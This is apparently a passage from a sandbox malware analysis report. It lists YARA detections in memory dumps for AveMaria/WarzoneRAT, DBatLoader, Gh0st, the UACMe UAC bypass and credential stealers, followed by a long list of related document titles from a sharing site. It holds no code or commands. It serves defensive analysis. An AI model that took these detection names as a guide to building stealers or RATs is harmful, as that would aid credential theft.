Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000023.00000002.421819823.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000023.00000002.421819823.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via
IExecuteCommand COM object, Source: 00000023.00000002.421819823.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author:
ditekSHen
Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source:
00000023.00000002.421819823.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Rule: AveMaria_WarZone, Description: unknown, Source:
00000023.00000002.421819823.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000023.00000000.414050341.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source:
00000023.00000002.421552545.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000023.00000002.421552545.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source:
00000023.00000002.421552545.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000023.00000002.421552545.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000023.00000002.421552545.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000023.00000002.421552545.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via
IExecuteCommand COM object, Source: 00000023.00000002.421552545.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author:
ditekSHen
Rule: MALWARE_Win_WarzoneRAT, Description: Detects AveMaria/WarzoneRAT, Source:
00000023.00000002.421552545.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source:
00000023.00000002.421552545.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Rule: AveMaria_WarZone, Description: unknown, Source:
00000023.00000002.421552545.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000023.00000002.422411266.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Disassembly
⊘ No disassembly

Malware Analysis Sandbox: Project On
100% (1)
Malware Analysis Sandbox: Project On
16 pages
Immediate download Evasive Malware A Field Guide to Detecting Analyzing and Defeating Advanced Threats 1 / converted Edition Kyle Cucci ebooks 2024
100% (9)
Immediate download Evasive Malware A Field Guide to Detecting Analyzing and Defeating Advanced Threats 1 / converted Edition Kyle Cucci ebooks 2024
85 pages
Malware Analysis Syllabus
No ratings yet
Malware Analysis Syllabus
3 pages
Practical Malware Analysis - Part 2 Dynamic Analysis
No ratings yet
Practical Malware Analysis - Part 2 Dynamic Analysis
33 pages
Report
No ratings yet
Report
287 pages
RAPORT Ihre Im Virustotal
No ratings yet
RAPORT Ihre Im Virustotal
16 pages
Report PDF
No ratings yet
Report PDF
306 pages
Malware Analysis
No ratings yet
Malware Analysis
15 pages
Report
No ratings yet
Report
9 pages
report-f11948edf3ad78021e0d404c10b56ab4
No ratings yet
report-f11948edf3ad78021e0d404c10b56ab4
36 pages
Malware Analysis
100% (1)
Malware Analysis
4 pages
Detect Malware W Memory Forensics
100% (1)
Detect Malware W Memory Forensics
27 pages
Global Verdict Report 4
No ratings yet
Global Verdict Report 4
35 pages
Evasive Malware A Field Guide to Detecting Analyzing and Defeating Advanced Threats 1 / converted Edition Kyle Cucci - The ebook in PDF and DOCX formats is ready for download
100% (1)
Evasive Malware A Field Guide to Detecting Analyzing and Defeating Advanced Threats 1 / converted Edition Kyle Cucci - The ebook in PDF and DOCX formats is ready for download
43 pages
? Malware Analysis Report
No ratings yet
? Malware Analysis Report
16 pages
Report
No ratings yet
Report
34 pages
Report
No ratings yet
Report
128 pages
SANS Memory Forensics CheatSheet 3.0
No ratings yet
SANS Memory Forensics CheatSheet 3.0
2 pages
task 3.0
No ratings yet
task 3.0
33 pages
Information Security Management
No ratings yet
Information Security Management
12 pages
OSINT Reprot
No ratings yet
OSINT Reprot
40 pages
Id: 377188 Sample Name: Upx0V9Wce6 Cookbook: Default - Jbs Time: 09:09:49 Date: 29/03/2021 Version: 31.0.0 Emerald
No ratings yet
Id: 377188 Sample Name: Upx0V9Wce6 Cookbook: Default - Jbs Time: 09:09:49 Date: 29/03/2021 Version: 31.0.0 Emerald
36 pages
Report
No ratings yet
Report
16 pages
Building a M Platform at Home 1739382859
No ratings yet
Building a M Platform at Home 1739382859
50 pages
Report TreatGrid
No ratings yet
Report TreatGrid
201 pages
Instant Access to Evasive Malware A Field Guide to Detecting Analyzing and Defeating Advanced Threats 1 / converted Edition Kyle Cucci ebook Full Chapters
100% (1)
Instant Access to Evasive Malware A Field Guide to Detecting Analyzing and Defeating Advanced Threats 1 / converted Edition Kyle Cucci ebook Full Chapters
65 pages
Malware Sandboxing Technique
No ratings yet
Malware Sandboxing Technique
19 pages
Int251 Malware Analysis and Cyber Defence
No ratings yet
Int251 Malware Analysis and Cyber Defence
3 pages
Malware Analysis
100% (1)
Malware Analysis
26 pages
Wildfire Sample Report
No ratings yet
Wildfire Sample Report
132 pages
Malware Analysis on Windows 10 Virtual Machine
No ratings yet
Malware Analysis on Windows 10 Virtual Machine
4 pages
Malware Analysis: Anusha GR
No ratings yet
Malware Analysis: Anusha GR
18 pages
REMA.142
No ratings yet
REMA.142
8 pages
EDDC5C6B045DD998AE1771131B6C51DA1548C2E7_report_va
No ratings yet
EDDC5C6B045DD998AE1771131B6C51DA1548C2E7_report_va
48 pages
Antivirus Cheat Sheet
No ratings yet
Antivirus Cheat Sheet
2 pages
Taking Advantage of PE Metadata
No ratings yet
Taking Advantage of PE Metadata
9 pages
EDR originating Processes
No ratings yet
EDR originating Processes
3 pages
Malware Analysis for beginners by adarsh pandey
No ratings yet
Malware Analysis for beginners by adarsh pandey
30 pages
Malware Analysis
No ratings yet
Malware Analysis
24 pages
Malware Analysis Checklist
No ratings yet
Malware Analysis Checklist
7 pages
Evasive Malware A Field Guide to Detecting Analyzing and Defeating Advanced Threats 1 / converted Edition Kyle Cucci instant download
100% (1)
Evasive Malware A Field Guide to Detecting Analyzing and Defeating Advanced Threats 1 / converted Edition Kyle Cucci instant download
53 pages
Malware Analysis Question Bank_ANS
No ratings yet
Malware Analysis Question Bank_ANS
60 pages
Malware Sandboxing PDF
100% (1)
Malware Sandboxing PDF
19 pages
Windows Forensics
No ratings yet
Windows Forensics
1 page
MALCRYPTION
No ratings yet
MALCRYPTION
9 pages
1745213572774
No ratings yet
1745213572774
9 pages
Chapter 2
No ratings yet
Chapter 2
30 pages
Practical Malware Analysis
No ratings yet
Practical Malware Analysis
65 pages
Introduction To Malware
No ratings yet
Introduction To Malware
86 pages
Dokumen - Tips - Malware Hunting With The Sysinternals Tools
No ratings yet
Dokumen - Tips - Malware Hunting With The Sysinternals Tools
58 pages
ch0 1
No ratings yet
ch0 1
78 pages
Advanced Malware Analysis 2020
No ratings yet
Advanced Malware Analysis 2020
20 pages
Malware_Analysis_Presentation
No ratings yet
Malware_Analysis_Presentation
15 pages
global-verdict-report
No ratings yet
global-verdict-report
2 pages
Jackcr Forensic Challenge Report - Ver2-20121202-BN
No ratings yet
Jackcr Forensic Challenge Report - Ver2-20121202-BN
29 pages
Ultra Virus Killer Log
No ratings yet
Ultra Virus Killer Log
8 pages
Memory Forensics Cheat Sheet v1
No ratings yet
Memory Forensics Cheat Sheet v1
2 pages
ch0 1
No ratings yet
ch0 1
72 pages
ITSS - 13 IT Security Standard - Bring Your Own Device "BYOD"
No ratings yet
ITSS - 13 IT Security Standard - Bring Your Own Device "BYOD"
5 pages
Module 07 Viruses and Worms
No ratings yet
Module 07 Viruses and Worms
50 pages
International Schools Hebes T Revision Sheet ICT (Computer) Inal F
No ratings yet
International Schools Hebes T Revision Sheet ICT (Computer) Inal F
6 pages
Eliminar Virus Topi
No ratings yet
Eliminar Virus Topi
18 pages
Security Assessment Report
No ratings yet
Security Assessment Report
13 pages
Nse8 811
No ratings yet
Nse8 811
62 pages
Tle CSS9 Q1 M17
No ratings yet
Tle CSS9 Q1 M17
17 pages
EmpTech M4 Internet Threats
No ratings yet
EmpTech M4 Internet Threats
9 pages
Palo-Alto-Networks Premium PCNSA - by - VCEplus 50q-DEMO PDF
No ratings yet
Palo-Alto-Networks Premium PCNSA - by - VCEplus 50q-DEMO PDF
22 pages
Recon2015 01 Joan Calvet Marion Marschalek Paul Rascagneres Totally Spies PDF
No ratings yet
Recon2015 01 Joan Calvet Marion Marschalek Paul Rascagneres Totally Spies PDF
58 pages
ICDL IT Security
100% (1)
ICDL IT Security
62 pages
Security Information and Event Management Tools
No ratings yet
Security Information and Event Management Tools
5 pages
Computer 2
No ratings yet
Computer 2
10 pages
COMPUTER FUNDAMENTALS (BBA 1st Sem)
No ratings yet
COMPUTER FUNDAMENTALS (BBA 1st Sem)
41 pages
Assignment: Work Will Not Be Accepted and Will Be Required For
No ratings yet
Assignment: Work Will Not Be Accepted and Will Be Required For
11 pages
Mcafee Mvision Unified Cloud Edge Getting Started 11-2-2021
No ratings yet
Mcafee Mvision Unified Cloud Edge Getting Started 11-2-2021
62 pages
UsbFix Report
No ratings yet
UsbFix Report
3 pages
Antivirus Event Analysis CheatSheet 1.1
No ratings yet
Antivirus Event Analysis CheatSheet 1.1
1 page
CIS Controls v8 Mapping To ISO - IEC 27002.2022 2 2023
100% (1)
CIS Controls v8 Mapping To ISO - IEC 27002.2022 2 2023
105 pages
Cyber Security Policy
No ratings yet
Cyber Security Policy
39 pages
Amazon Pay BB Project v1!8!82
No ratings yet
Amazon Pay BB Project v1!8!82
75 pages
Security and Privacy On The Internet
No ratings yet
Security and Privacy On The Internet
6 pages
WinCC V70 OS Antivirus Compatibility List
No ratings yet
WinCC V70 OS Antivirus Compatibility List
2 pages
Running Head: MALWARE
No ratings yet
Running Head: MALWARE
12 pages
Run Standard Diagnostic Tools
No ratings yet
Run Standard Diagnostic Tools
13 pages
0417_w24_qp_12
100% (1)
0417_w24_qp_12
12 pages
Audcise Chapter5
No ratings yet
Audcise Chapter5
6 pages
ISO27k Model Security Policy On Malware PDF
No ratings yet
ISO27k Model Security Policy On Malware PDF
5 pages
Artificial Intelligence - 141727
100% (1)
Artificial Intelligence - 141727
11 pages
Security, Legal and Ethical Issues
No ratings yet
Security, Legal and Ethical Issues
21 pages